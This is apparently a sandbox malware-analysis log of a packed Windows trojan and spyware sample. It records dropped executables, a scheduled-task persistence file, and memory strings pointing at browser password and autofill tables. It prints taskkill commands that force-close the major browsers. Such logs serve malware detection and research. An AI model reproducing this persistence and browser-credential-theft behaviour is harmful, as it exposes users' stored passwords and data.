Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name:
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .idata
Source: num[1].exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A25A6B 0_3_00A25A6B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A772AF 0_3_00A772AF
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CEA9 3_2_0070CEA9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070DF41 3_2_0070DF41
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_00B5F240 9_3_00B5F240
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2314265372.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315584017.00000000058AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302667268.0000000005959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304661218.0000000005969000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320473793.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318541568.0000000005AFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298116630.0000000005705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312403645.0000000005984000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320042318.00000000059EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317116942.00000000059C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318680007.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300481825.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319029814.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336108235.0000000000A93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304926008.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311900870.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319358797.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314888959.0000000005998000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307982444.0000000005A2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319898376.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297708553.000000000554B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314652179.0000000005A90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300280192.000000000595B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300096488.00000000059EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336051823.0000000005502000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2303039256.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301292510.0000000005950000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312986824.0000000005982000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320338070.00000000059F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310913305.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312781647.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315867190.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316541745.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315154993.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318262366.00000000058A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299412323.000000000594E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318824120.00000000059DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319627971.00000000059D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301881249.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319761262.0000000005B18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305379281.0000000005962000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315703983.00000000059C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316964249.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317313180.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314769491.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314440329.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301692963.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313137854.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313672557.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310667303.0000000005A50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319216768.00000000059E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310397804.000000000597F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320621767.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313441326.0000000005985000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301587395.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314141083.000000000599C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316678110.00000000059BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330727859.0000000005DF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311380261.0000000005A4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319493526.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297858315.00000000058B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318121775.00000000059C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314553440.0000000005997000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313920539.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316002519.00000000059B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315006842.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315431935.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297781995.0000000005704000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300177986.00000000058AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297997212.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302564934.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299255200.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2303668328.0000000005969000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316142750.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320789721.00000000059FF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310002624.00000000058B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301488223.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311759056.0000000005985000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302852436.000000000595A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315302824.00000000059A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317983569.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313812274.000000000598D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301794711.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299082640.00000000058B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304183167.00000000058A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311543690.00000000058AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297921910.0000000005709000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302475747.000000000595D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302757448.00000000058A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311209473.0000000005979000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301394257.00000000059F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300688784.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316404816.00000000059B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316810819.0000000005AD7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317828945.00000000059C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318403942.00000000059CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336003627.0000000005336000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316251244.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320193834.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298999465.0000000005707000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298906336.00000000058AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314031874.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299171124.0000000005945000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302941014.0000000005A16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300578904.000000000595A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: skotes.exe.4.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: random[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: efe6fe4127.exe.5.dr Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: random[1].exe0.5.dr Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
Source: b76bb5cee7.exe.5.dr Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Section: ZLIB complexity 0.9977009536784741
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Section: qodksccb ZLIB complexity 0.9945776126305862
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.4.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/26@100/14
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_04B715D0 ChangeServiceConfigA, 3_2_04B715D0
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YQEN9A9QU4P1VROBPV5YS.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofill;H&&
Source: file.exe, 00000000.00000003.2159282380.00000000052F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175481381.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159535647.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174842839.00000000052F6000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2662978061.0000000005703000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2648842330.000000000570E000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2662787752.000000000570E000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649818466.00000000056DF000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2820465391.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2817353634.00000000061E7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2797807955.00000000062C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: YQEN9A9QU4P1VROBPV5YS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: YQEN9A9QU4P1VROBPV5YS.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe "C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe "C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe"
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
